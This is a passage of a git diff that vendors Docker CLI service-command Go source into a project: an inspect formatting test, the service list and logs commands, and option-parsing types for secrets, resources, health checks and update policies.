+	if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil {
+		return cli.StatusError{StatusCode: 1, Status: err.Error()}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go
new file mode 100644
index 0000000000..04a65080c7
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go
@@ -0,0 +1,129 @@
+package service
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string {
+	b := new(bytes.Buffer)
+
+	endpointSpec := &swarm.EndpointSpec{
+		Mode: "vip",
+		Ports: []swarm.PortConfig{
+			{
+				Protocol:   swarm.PortConfigProtocolTCP,
+				TargetPort: 5000,
+			},
+		},
+	}
+
+	two := uint64(2)
+
+	s := swarm.Service{
+		ID: "de179gar9d0o7ltdybungplod",
+		Meta: swarm.Meta{
+			Version:   swarm.Version{Index: 315},
+			CreatedAt: now,
+			UpdatedAt: now,
+		},
+		Spec: swarm.ServiceSpec{
+			Annotations: swarm.Annotations{
+				Name:   "my_service",
+				Labels: map[string]string{"com.label": "foo"},
+			},
+			TaskTemplate: swarm.TaskSpec{
+				ContainerSpec: swarm.ContainerSpec{
+					Image: "foo/bar@sha256:this_is_a_test",
+				},
+			},
+			Mode: swarm.ServiceMode{
+				Replicated: &swarm.ReplicatedService{
+					Replicas: &two,
+				},
+			},
+			UpdateConfig: nil,
+			Networks: []swarm.NetworkAttachmentConfig{
+				{
+					Target:  "5vpyomhb6ievnk0i0o60gcnei",
+					Aliases: []string{"web"},
+				},
+			},
+			EndpointSpec: endpointSpec,
+		},
+		Endpoint: swarm.Endpoint{
+			Spec: *endpointSpec,
+			Ports: []swarm.PortConfig{
+				{
+					Protocol:      swarm.PortConfigProtocolTCP,
+					TargetPort:    5000,
+					PublishedPort: 30000,
+				},
+			},
+			VirtualIPs: []swarm.EndpointVirtualIP{
+				{
+					NetworkID: "6o4107cj2jx9tihgb0jyts6pj",
+					Addr:      "10.255.0.4/16",
+				},
+			},
+		},
+		UpdateStatus: swarm.UpdateStatus{
+			StartedAt:   now,
+			CompletedAt: now,
+		},
+	}
+
+	ctx := formatter.Context{
+		Output: b,
+		Format: format,
+	}
+
+	err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) {
+		return s, nil, nil
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	return b.String()
+}
+
+func TestPrettyPrintWithNoUpdateConfig(t *testing.T) {
+	s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now())
+	if strings.Contains(s, "UpdateStatus") {
+		t.Fatal("Pretty print failed before parsing UpdateStatus")
+	}
+}
+
+func TestJSONFormatWithNoUpdateConfig(t *testing.T) {
+	now := time.Now()
+	// s1: [{"ID":..}]
+	// s2: {"ID":..}
+	s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now)
+	t.Log("// s1")
+	t.Logf("%s", s1)
+	s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now)
+	t.Log("// s2")
+	t.Logf("%s", s2)
+	var m1Wrap []map[string]interface{}
+	if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil {
+		t.Fatal(err)
+	}
+	if len(m1Wrap) != 1 {
+		t.Fatalf("strange s1=%s", s1)
+	}
+	m1 := m1Wrap[0]
+	t.Logf("m1=%+v", m1)
+	var m2 map[string]interface{}
+	if err := json.Unmarshal([]byte(s2), &m2); err != nil {
+		t.Fatal(err)
+	}
+	t.Logf("m2=%+v", m2)
+	assert.DeepEqual(t, m2, m1)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go
new file mode 100644
index 0000000000..724126079c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/list.go
@@ -0,0 +1,158 @@
+package service
+
+import (
+	"fmt"
+	"io"
+	"text/tabwriter"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+const (
+	listItemFmt = "%s\t%s\t%s\t%s\t%s\n"
+)
+
+type listOptions struct {
+	quiet  bool
+	filter opts.FilterOpt
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Aliases: []string{"list"},
+		Short:   "List services",
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	ctx := context.Background()
+	client := dockerCli.Client()
+	out := dockerCli.Out()
+
+	services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: opts.filter.Value()})
+	if err != nil {
+		return err
+	}
+
+	if len(services) > 0 && !opts.quiet {
+		// only non-empty services and not quiet, should we call TaskList and NodeList api
+		taskFilter := filters.NewArgs()
+		for _, service := range services {
+			taskFilter.Add("service", service.ID)
+		}
+
+		tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter})
+		if err != nil {
+			return err
+		}
+
+		nodes, err := client.NodeList(ctx, types.NodeListOptions{})
+		if err != nil {
+			return err
+		}
+
+		PrintNotQuiet(out, services, nodes, tasks)
+	} else if !opts.quiet {
+		// no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS...
+		PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{})
+	} else {
+		PrintQuiet(out, services)
+	}
+
+	return nil
+}
+
+// PrintNotQuiet shows service list in a non-quiet way.
+// Besides this, command `docker stack services xxx` will call this, too.
+func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) {
+	activeNodes := make(map[string]struct{})
+	for _, n := range nodes {
+		if n.Status.State != swarm.NodeStateDown {
+			activeNodes[n.ID] = struct{}{}
+		}
+	}
+
+	running := map[string]int{}
+	tasksNoShutdown := map[string]int{}
+
+	for _, task := range tasks {
+		if task.DesiredState != swarm.TaskStateShutdown {
+			tasksNoShutdown[task.ServiceID]++
+		}
+
+		if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning {
+			running[task.ServiceID]++
+		}
+	}
+
+	printTable(out, services, running, tasksNoShutdown)
+}
+
+func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) {
+	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
+
+	// Ignore flushing errors
+	defer writer.Flush()
+
+	fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE")
+
+	for _, service := range services {
+		mode := ""
+		replicas := ""
+		if service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil {
+			mode = "replicated"
+			replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas)
+		} else if service.Spec.Mode.Global != nil {
+			mode = "global"
+			replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID])
+		}
+		image := service.Spec.TaskTemplate.ContainerSpec.Image
+		ref, err := distreference.ParseNamed(image)
+		if err == nil {
+			// update image string for display
+			namedTagged, ok := ref.(distreference.NamedTagged)
+			if ok {
+				image = namedTagged.Name() + ":" + namedTagged.Tag()
+			}
+		}
+
+		fmt.Fprintf(
+			writer,
+			listItemFmt,
+			stringid.TruncateID(service.ID),
+			service.Spec.Name,
+			mode,
+			replicas,
+			image)
+	}
+}
+
+// PrintQuiet shows service list in a quiet way.
+// Besides this, command `docker stack services xxx` will call this, too.
+func PrintQuiet(out io.Writer, services []swarm.Service) {
+	for _, service := range services {
+		fmt.Fprintln(out, service.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go
new file mode 100644
index 0000000000..19d3d9a488
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/logs.go
@@ -0,0 +1,163 @@
+package service
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/idresolver"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/spf13/cobra"
+)
+
+type logsOptions struct {
+	noResolve  bool
+	follow     bool
+	since      string
+	timestamps bool
+	details    bool
+	tail       string
+
+	service string
+}
+
+func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts logsOptions
+
+	cmd := &cobra.Command{
+		Use:   "logs [OPTIONS] SERVICE",
+		Short: "Fetch the logs of a service",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.service = args[0]
+			return runLogs(dockerCli, &opts)
+		},
+		Tags: map[string]string{"experimental": ""},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
+	flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output")
+	flags.StringVar(&opts.since, "since", "", "Show logs since timestamp")
+	flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps")
+	flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs")
+	flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs")
+	return cmd
+}
+
+func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error {
+	ctx := context.Background()
+
+	options := types.ContainerLogsOptions{
+		ShowStdout: true,
+		ShowStderr: true,
+		Since:      opts.since,
+		Timestamps: opts.timestamps,
+		Follow:     opts.follow,
+		Tail:       opts.tail,
+		Details:    opts.details,
+	}
+
+	client := dockerCli.Client()
+	responseBody, err := client.ServiceLogs(ctx, opts.service, options)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	resolver := idresolver.New(client, opts.noResolve)
+
+	stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()}
+	stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()}
+
+	// TODO(aluzzardi): Do an io.Copy for services with TTY enabled.
+	_, err = stdcopy.StdCopy(stdout, stderr, responseBody)
+	return err
+}
+
+type logWriter struct {
+	ctx  context.Context
+	opts *logsOptions
+	r    *idresolver.IDResolver
+	w    io.Writer
+}
+
+func (lw *logWriter) Write(buf []byte) (int, error) {
+	contextIndex := 0
+	numParts := 2
+	if lw.opts.timestamps {
+		contextIndex++
+		numParts++
+	}
+
+	parts := bytes.SplitN(buf, []byte(" "), numParts)
+	if len(parts) != numParts {
+		return 0, fmt.Errorf("invalid context in log message: %v", string(buf))
+	}
+
+	taskName, nodeName, err := lw.parseContext(string(parts[contextIndex]))
+	if err != nil {
+		return 0, err
+	}
+
+	output := []byte{}
+	for i, part := range parts {
+		// First part doesn't get space separation.
+		if i > 0 {
+			output = append(output, []byte(" ")...)
+		}
+
+		if i == contextIndex {
+			// TODO(aluzzardi): Consider constant padding.
+			output = append(output, []byte(fmt.Sprintf("%s@%s    |", taskName, nodeName))...)
+		} else {
+			output = append(output, part...)
+		}
+	}
+	_, err = lw.w.Write(output)
+	if err != nil {
+		return 0, err
+	}
+
+	return len(buf), nil
+}
+
+func (lw *logWriter) parseContext(input string) (string, string, error) {
+	context := make(map[string]string)
+
+	components := strings.Split(input, ",")
+	for _, component := range components {
+		parts := strings.SplitN(component, "=", 2)
+		if len(parts) != 2 {
+			return "", "", fmt.Errorf("invalid context: %s", input)
+		}
+		context[parts[0]] = parts[1]
+	}
+
+	taskID, ok := context["com.docker.swarm.task.id"]
+	if !ok {
+		return "", "", fmt.Errorf("missing task id in context: %s", input)
+	}
+	taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID)
+	if err != nil {
+		return "", "", err
+	}
+
+	nodeID, ok := context["com.docker.swarm.node.id"]
+	if !ok {
+		return "", "", fmt.Errorf("missing node id in context: %s", input)
+	}
+	nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID)
+	if err != nil {
+		return "", "", err
+	}
+
+	return taskName, nodeName, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go
new file mode 100644
index 0000000000..cbe544aacc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/opts.go
@@ -0,0 +1,648 @@
+package service
+
+import (
+	"encoding/csv"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+	units "github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type int64Value interface {
+	Value() int64
+}
+
+type memBytes int64
+
+func (m *memBytes) String() string {
+	return units.BytesSize(float64(m.Value()))
+}
+
+func (m *memBytes) Set(value string) error {
+	val, err := units.RAMInBytes(value)
+	*m = memBytes(val)
+	return err
+}
+
+func (m *memBytes) Type() string {
+	return "bytes"
+}
+
+func (m *memBytes) Value() int64 {
+	return int64(*m)
+}
+
+// PositiveDurationOpt is an option type for time.Duration that uses a pointer.
+// It bahave similarly to DurationOpt but only allows positive duration values.
+type PositiveDurationOpt struct {
+	DurationOpt
+}
+
+// Set a new value on the option. Setting a negative duration value will cause
+// an error to be returned.
+func (d *PositiveDurationOpt) Set(s string) error {
+	err := d.DurationOpt.Set(s)
+	if err != nil {
+		return err
+	}
+	if *d.DurationOpt.value < 0 {
+		return fmt.Errorf("duration cannot be negative")
+	}
+	return nil
+}
+
+// DurationOpt is an option type for time.Duration that uses a pointer. This
+// allows us to get nil values outside, instead of defaulting to 0
+type DurationOpt struct {
+	value *time.Duration
+}
+
+// Set a new value on the option
+func (d *DurationOpt) Set(s string) error {
+	v, err := time.ParseDuration(s)
+	d.value = &v
+	return err
+}
+
+// Type returns the type of this option, which will be displayed in `--help` output
+func (d *DurationOpt) Type() string {
+	return "duration"
+}
+
+// String returns a string repr of this option
+func (d *DurationOpt) String() string {
+	if d.value != nil {
+		return d.value.String()
+	}
+	return ""
+}
+
+// Value returns the time.Duration
+func (d *DurationOpt) Value() *time.Duration {
+	return d.value
+}
+
+// Uint64Opt represents a uint64.
+type Uint64Opt struct {
+	value *uint64
+}
+
+// Set a new value on the option
+func (i *Uint64Opt) Set(s string) error {
+	v, err := strconv.ParseUint(s, 0, 64)
+	i.value = &v
+	return err
+}
+
+// Type returns the type of this option, which will be displayed in `--help` output
+func (i *Uint64Opt) Type() string {
+	return "uint"
+}
+
+// String returns a string repr of this option
+func (i *Uint64Opt) String() string {
+	if i.value != nil {
+		return fmt.Sprintf("%v", *i.value)
+	}
+	return ""
+}
+
+// Value returns the uint64
+func (i *Uint64Opt) Value() *uint64 {
+	return i.value
+}
+
+type floatValue float32
+
+func (f *floatValue) Set(s string) error {
+	v, err := strconv.ParseFloat(s, 32)
+	*f = floatValue(v)
+	return err
+}
+
+func (f *floatValue) Type() string {
+	return "float"
+}
+
+func (f *floatValue) String() string {
+	return strconv.FormatFloat(float64(*f), 'g', -1, 32)
+}
+
+func (f *floatValue) Value() float32 {
+	return float32(*f)
+}
+
+// SecretRequestSpec is a type for requesting secrets
+type SecretRequestSpec struct {
+	source string
+	target string
+	uid    string
+	gid    string
+	mode   os.FileMode
+}
+
+// SecretOpt is a Value type for parsing secrets
+type SecretOpt struct {
+	values []*SecretRequestSpec
+}
+
+// Set a new secret value
+func (o *SecretOpt) Set(value string) error {
+	csvReader := csv.NewReader(strings.NewReader(value))
+	fields, err := csvReader.Read()
+	if err != nil {
+		return err
+	}
+
+	spec := &SecretRequestSpec{
+		source: "",
+		target: "",
+		uid:    "0",
+		gid:    "0",
+		mode:   0444,
+	}
+
+	for _, field := range fields {
+		parts := strings.SplitN(field, "=", 2)
+		key := strings.ToLower(parts[0])
+
+		if len(parts) != 2 {
+			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
+		}
+
+		value := parts[1]
+		switch key {
+		case "source", "src":
+			spec.source = value
+		case "target":
+			tDir, _ := filepath.Split(value)
+			if tDir != "" {
+				return fmt.Errorf("target must not have a path")
+			}
+			spec.target = value
+		case "uid":
+			spec.uid = value
+		case "gid":
+			spec.gid = value
+		case "mode":
+			m, err := strconv.ParseUint(value, 0, 32)
+			if err != nil {
+				return fmt.Errorf("invalid mode specified: %v", err)
+			}
+
+			spec.mode = os.FileMode(m)
+		default:
+			return fmt.Errorf("invalid field in secret request: %s", key)
+		}
+	}
+
+	if spec.source == "" {
+		return fmt.Errorf("source is required")
+	}
+
+	o.values = append(o.values, spec)
+	return nil
+}
+
+// Type returns the type of this option
+func (o *SecretOpt) Type() string {
+	return "secret"
+}
+
+// String returns a string repr of this option
+func (o *SecretOpt) String() string {
+	secrets := []string{}
+	for _, secret := range o.values {
+		repr := fmt.Sprintf("%s -> %s", secret.source, secret.target)
+		secrets = append(secrets, repr)
+	}
+	return strings.Join(secrets, ", ")
+}
+
+// Value returns the secret requests
+func (o *SecretOpt) Value() []*SecretRequestSpec {
+	return o.values
+}
+
+type updateOptions struct {
+	parallelism     uint64
+	delay           time.Duration
+	monitor         time.Duration
+	onFailure       string
+	maxFailureRatio floatValue
+}
+
+type resourceOptions struct {
+	limitCPU      opts.NanoCPUs
+	limitMemBytes memBytes
+	resCPU        opts.NanoCPUs
+	resMemBytes   memBytes
+}
+
+func (r *resourceOptions) ToResourceRequirements() *swarm.ResourceRequirements {
+	return &swarm.ResourceRequirements{
+		Limits: &swarm.Resources{
+			NanoCPUs:    r.limitCPU.Value(),
+			MemoryBytes: r.limitMemBytes.Value(),
+		},
+		Reservations: &swarm.Resources{
+			NanoCPUs:    r.resCPU.Value(),
+			MemoryBytes: r.resMemBytes.Value(),
+		},
+	}
+}
+
+type restartPolicyOptions struct {
+	condition   string
+	delay       DurationOpt
+	maxAttempts Uint64Opt
+	window      DurationOpt
+}
+
+func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy {
+	return &swarm.RestartPolicy{
+		Condition:   swarm.RestartPolicyCondition(r.condition),
+		Delay:       r.delay.Value(),
+		MaxAttempts: r.maxAttempts.Value(),
+		Window:      r.window.Value(),
+	}
+}
+
+func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig {
+	nets := []swarm.NetworkAttachmentConfig{}
+	for _, network := range networks {
+		nets = append(nets, swarm.NetworkAttachmentConfig{Target: network})
+	}
+	return nets
+}
+
+type endpointOptions struct {
+	mode         string
+	publishPorts opts.PortOpt
+}
+
+func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec {
+	return &swarm.EndpointSpec{
+		Mode:  swarm.ResolutionMode(strings.ToLower(e.mode)),
+		Ports: e.publishPorts.Value(),
+	}
+}
+
+type logDriverOptions struct {
+	name string
+	opts opts.ListOpts
+}
+
+func newLogDriverOptions() logDriverOptions {
+	return logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)}
+}
+
+func (ldo *logDriverOptions) toLogDriver() *swarm.Driver {
+	if ldo.name == "" {
+		return nil
+	}
+
+	// set the log driver only if specified.
+	return &swarm.Driver{
+		Name:    ldo.name,
+		Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()),
+	}
+}
+
+type healthCheckOptions struct {
+	cmd           string
+	interval      PositiveDurationOpt
+	timeout       PositiveDurationOpt
+	retries       int
+	noHealthcheck bool
+}
+
+func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) {
+	var healthConfig *container.HealthConfig
+	haveHealthSettings := opts.cmd != "" ||
+		opts.interval.Value() != nil ||
+		opts.timeout.Value() != nil ||
+		opts.retries != 0
+	if opts.noHealthcheck {
+		if haveHealthSettings {
+			return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck)
+		}
+		healthConfig = &container.HealthConfig{Test: []string{"NONE"}}
+	} else if haveHealthSettings {
+		var test []string
+		if opts.cmd != "" {
+			test = []string{"CMD-SHELL", opts.cmd}
+		}
+		var interval, timeout time.Duration
+		if ptr := opts.interval.Value(); ptr != nil {
+			interval = *ptr
+		}
+		if ptr := opts.timeout.Value(); ptr != nil {
+			timeout = *ptr
+		}
+		healthConfig = &container.HealthConfig{
+			Test:     test,
+			Interval: interval,
+			Timeout:  timeout,
+			Retries:  opts.retries,
+		}
+	}
+	return healthConfig, nil
+}
+
+// ValidatePort validates a string is in the expected format for a port definition
+func ValidatePort(value string) (string, error) {
+	portMappings, err := nat.ParsePortSpec(value)
+	for _, portMapping := range portMappings {
+		if portMapping.Binding.HostIP != "" {
+			return "", fmt.Errorf("HostIP is not supported by a service.")
+		}
+	}
+	return value, err
+}
+
+// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli
+//     <host>:<ip>
+// into a swarmkit host format:
+//     IP_address canonical_hostname [aliases...]
+// This assumes input value (<host>:<ip>) has already been validated
+func convertExtraHostsToSwarmHosts(extraHosts []string) []string {
+	hosts := []string{}
+	for _, extraHost := range extraHosts {
+		parts := strings.SplitN(extraHost, ":", 2)
+		hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0]))
+	}
+	return hosts
+}
+
+type serviceOptions struct {
+	name            string
+	labels          opts.ListOpts
+	containerLabels opts.ListOpts
+	image           string
+	args            []string
+	hostname        string
+	env             opts.ListOpts
+	envFile         opts.ListOpts
+	workdir         string
+	user            string
+	groups          opts.ListOpts
+	tty             bool
+	mounts          opts.MountOpt
+	dns             opts.ListOpts
+	dnsSearch       opts.ListOpts
+	dnsOption       opts.ListOpts
+	hosts           opts.ListOpts
+
+	resources resourceOptions
+	stopGrace DurationOpt
+
+	replicas Uint64Opt
+	mode     string
+
+	restartPolicy restartPolicyOptions
+	constraints   opts.ListOpts
+	update        updateOptions
+	networks      opts.ListOpts
+	endpoint      endpointOptions
+
+	registryAuth bool
+
+	logDriver logDriverOptions
+
+	healthcheck healthCheckOptions
+	secrets     opts.SecretOpt
+}
+
+func newServiceOptions() *serviceOptions {
+	return &serviceOptions{
+		labels:          opts.NewListOpts(runconfigopts.ValidateEnv),
+		constraints:     opts.NewListOpts(nil),
+		containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv),
+		env:             opts.NewListOpts(runconfigopts.ValidateEnv),
+		envFile:         opts.NewListOpts(nil),
+		groups:          opts.NewListOpts(nil),
+		logDriver:       newLogDriverOptions(),
+		dns:             opts.NewListOpts(opts.ValidateIPAddress),
+		dnsOption:       opts.NewListOpts(nil),
+		dnsSearch:       opts.NewListOpts(opts.ValidateDNSSearch),
+		hosts:           opts.NewListOpts(runconfigopts.ValidateExtraHost),
+		networks:        opts.NewListOpts(nil),
+	}
+}
+
+func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) {
+	var service swarm.ServiceSpec
+
+	envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll())
+	if err != nil {
+		return service, err
+	}
+
+	currentEnv := make([]string, 0, len(envVariables))
+	for _, env := range envVariables { // need to process each var, in order
+		k := strings.SplitN(env, "=", 2)[0]
+		for i, current := range currentEnv { // remove duplicates
+			if current == env {
+				continue // no update required, may hide this behind flag to preserve order of envVariables
+			}
+			if strings.HasPrefix(current, k+"=") {
+				currentEnv = append(currentEnv[:i], currentEnv[i+1:]...)
+			}
+		}
+		currentEnv = append(currentEnv, env)
+	}
+
+	service = swarm.ServiceSpec{
+		Annotations: swarm.Annotations{
+			Name:   opts.name,
+			Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
+		},
+		TaskTemplate: swarm.TaskSpec{
+			ContainerSpec: swarm.ContainerSpec{
+				Image:    opts.image,
+				Args:     opts.args,
+				Env:      currentEnv,
+				Hostname: opts.hostname,
+				Labels:   runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()),
+				Dir:      opts.workdir,
+				User:     opts.user,
+				Groups:   opts.groups.GetAll(),
+				TTY:      opts.tty,
+				Mounts:   opts.mounts.Value(),
+				DNSConfig: &swarm.DNSConfig{
+					Nameservers: opts.dns.GetAll(),
+					Search:      opts.dnsSearch.GetAll(),
+					Options:     opts.dnsOption.GetAll(),
+				},
+				Hosts:           convertExtraHostsToSwarmHosts(opts.hosts.GetAll()),
+				StopGracePeriod: opts.stopGrace.Value(),
+				Secrets:         nil,
+			},
+			Networks:      convertNetworks(opts.networks.GetAll()),
+			Resources:     opts.resources.ToResourceRequirements(),
+			RestartPolicy: opts.restartPolicy.ToRestartPolicy(),
+			Placement: &swarm.Placement{
+				Constraints: opts.constraints.GetAll(),
+			},
+			LogDriver: opts.logDriver.toLogDriver(),
+		},
+		Networks: convertNetworks(opts.networks.GetAll()),
+		Mode:     swarm.ServiceMode{},
+		UpdateConfig: &swarm.UpdateConfig{
+			Parallelism:     opts.update.parallelism,
+			Delay:           opts.update.delay,
+			Monitor:         opts.update.monitor,
+			FailureAction:   opts.update.onFailure,
+			MaxFailureRatio: opts.update.maxFailureRatio.Value(),
+		},
+		EndpointSpec: opts.endpoint.ToEndpointSpec(),
+	}
+
+	healthConfig, err := opts.healthcheck.toHealthConfig()
+	if err != nil {
+		return service, err
+	}
+	service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig
+
+	switch opts.mode {
+	case "global":
+		if opts.replicas.Value() != nil {
+			return service, fmt.Errorf("replicas can only be used with replicated mode")
+		}
+
+		service.Mode.Global = &swarm.GlobalService{}
+	case "replicated":
+		service.Mode.Replicated = &swarm.ReplicatedService{
+			Replicas: opts.replicas.Value(),
+		}
+	default:
+		return service, fmt.Errorf("Unknown mode: %s", opts.mode)
+	}
+	return service, nil
+}
+
+// addServiceFlags adds all flags that are common to both `create` and `update`.
+// Any flags that are not common are added separately in the individual command
+func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) {
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container")
+	flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
+	flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname")
+
+	flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs")
+	flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory")
+	flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs")
+	flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory")
+	flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)")
+
+	flags.Var(&opts.replicas, flagReplicas, "Number of tasks")
+
+	flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)")
+	flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)")
+	flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up")
+	flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)")
+
+	flags.Uint64Var(&opts.update.parallelism, flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)")
+	flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)")
+	flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)")
+	flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)")
+	flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update")
+
+	flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)")
+
+	flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents")
+
+	flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service")
+	flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options")
+
+	flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health")
+	flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)")
+	flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)")
+	flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy")
+	flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK")
+
+	flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY")
+}
+
+const (
